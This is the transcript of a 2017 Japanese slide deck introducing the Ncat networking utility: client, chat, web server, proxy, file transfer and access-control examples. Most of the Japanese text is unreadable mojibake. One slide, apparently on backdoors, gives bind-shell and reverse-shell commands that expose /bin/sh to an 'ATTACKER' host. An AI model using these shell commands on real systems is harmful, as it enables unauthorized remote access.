Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Ncatをつかおう / Use Ncat

Ncatをつかおう / Use Ncat

長岡 IT開発者 勉強会 第52回勉強会

87425b9ed1c97009802d66c6aebbfcdb?s=128

Hayato Imai

June 17, 2017
Tweet

Transcript

  1. /DBUΛ͔͓ͭ͏ ௕Ԭ*5։ൃऀษڧձୈճษڧձ /FUDBU

  2. ࣗݾ঺հ w )BZBUP*NBJࠓҪ൏ਓ w !IBZBKP w Πϯϑϥ୲౰

  3. /FUDBU

  4. /FUDBUͱ͸ w ODίϚϯυ w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ w ଟ໨తωοτϫʔΫϢʔςΟϦςΟ w 5$16%1ϓϩτίϧΛѻ͏ w

    DBUͷωοτϫʔΫ൛
  5. ͍Ζ͍Ζͳ/FUDBU OD ΦϦδφϧ w W  w 6CVOUV (/6൛ w

    ΦϦδφϧޓ׵ w "SDI FYUSB 0QFO#4%൛ w *1Wɺ6%4ରԠ w ίϚϯυ࣮ߦඇରԠ w $FOU04 w 049 /NBQ൛ ʢ/DBUʣ w 44-ରԠɺଟػೳ w $FOU04 OD!ODBU CVTZCPY൛ w ΄΅(/6൛ͱಉ͡ w #VTZ#PY w "MQJOF ࠓճ͸/NBQ൛/FUDBUͰ͋Δ/DBU ODBU Λ঺հ͠·͢ɻ IUUQTONBQPSHODBU
  6. /DBU ODBU ͷ͔͍͔ͭͨ

  7. ΫϥΠΞϯτ $ ncat -C example.com 80 )551ΫϥΠΞϯτ $ ncat -C

    HOST 11211 .FNDBDIFΫϥΠΞϯτ "4$** $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 . "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\ > ncat HOST 11211 |\ > hexdump -C .FNDBDIFΫϥΠΞϯτ #*/"3:
  8. αʔό  SERVER$ ncat -l --broker HOST1$ ncat SERVER HOST2$

    ncat SERVER $IBUαʔό CSPLFS SERVER$ ncat -l --chat HOST1$ ncat SERVER HOST2$ ncat SERVER $IBUαʔό DIBU $IBUαʔό SERVER$ ncat -l # σϑΥϧτϙʔτ31337 HOST1$ ncat SERVER
  9. αʔό  SERVER$ ncat -l 8080 -k \ > --sh-exec

    \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl http://SERVER:8080 8FCαʔό SERVER$ ncat --ssl -l 8443 -k \ > --sh-exec \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl -k https://SERVER:8443 8FCαʔό 44-
  10. ϓϩΩγ  PROXY$ ncat -l 8080 \ > --proxy-type http

    --proxy-auth user:pass CLIENT$ curl -v https://example.com \ > --proxy PROXY:8080 --proxy-user user:pass )551ϓϩΩγ PROXY$ ncat -l 1883 -k \ > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883' CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#" ϓϩτίϧม׵ )551)5514 PROXY$ ncat --ssl -l 8443 -k \ > --sh-exec 'ncat -i 3 -C localhost 3000' CLIENT$ curl -k https://PROXY:8443 44-Φϑϩʔυ
  11. ϓϩΩγ  PROXY$ mkfifo f PROXY$ ncat -l 8080 -k

    <f | \ > while true; do \ > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \ > done ίωΫγϣϯϓʔϦϯά $ httpstat https://example.com/ ... DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer [ 6ms | 96ms | 371ms | 96ms | 1ms ] | | | | | namelookup:6ms | | | | connect:102ms | | | pretransfer:473ms | | starttransfer:569ms | total:570ms $ httpstat http://PROXY:8080 -H 'Host: example.com' ... DNS Lookup TCP Connection Server Processing Content Transfer [ 5ms | 0ms | 98ms | 0ms ] | | | | namelookup:5ms | | | connect:5ms | | starttransfer:103ms | total:103ms
  12. ϑΝΠϧసૹ SERVER$ ncat -l 8080 --recv-only >out.file CLIENT$ ncat --send-only

    SERVER 8080 <in.file ΫϥΠΞϯταʔόసૹ SERVER$ ncat -l 8080 --send-only <in.file CLIENT$ ncat --recv-only SERVER 8080 >out.file αʔόΫϥΠΞϯτసૹ SERVER$ ncat --ssl -l 8080 --recv-only >out.file CLIENT$ ncat --ssl --send-only SERVER 8080 <in.file 44-సૹ ΫϥΠΞϯταʔόసૹ
  13. TARGET$ ncat -l --exec /bin/sh 8080 ATTACKER$ ncat TARGET 8080

    λʔήοτʹ௚઀ΞΫηεՄೳͳ৔߹ ATTACKER$ ncat -l 8080 TARGET$ ncat --exec /bin/sh ATTACKER 8080 λʔήοτ͕/"5എޙͷ৔߹ όοΫυΞ
  14. ΞΫηε੍ޚ $ ncat -l 8080 --allow 10.0.0.2 ڐՄ $ ncat

    -l 8080 --deny 10.0.0.0/8 ڋ൱ ྆ํࢦఆͨ͠৔߹͸EFOZ͕༏ઌ͞Ε·͢ɻ
  15. ·ͱΊ

  16. ·ͱΊ w /FUDBUίϚϯυ͸͍͔ͭ͘ͷ࣮૷͕͋Δ w /DBU͸ଟػೳɺ։ൃ΋੝ΜͳͷͰ͓͢͢Ί w ΞΠσΞ࣍ୈͰ༷ʑͳ࢖͍ํ͕͋Δ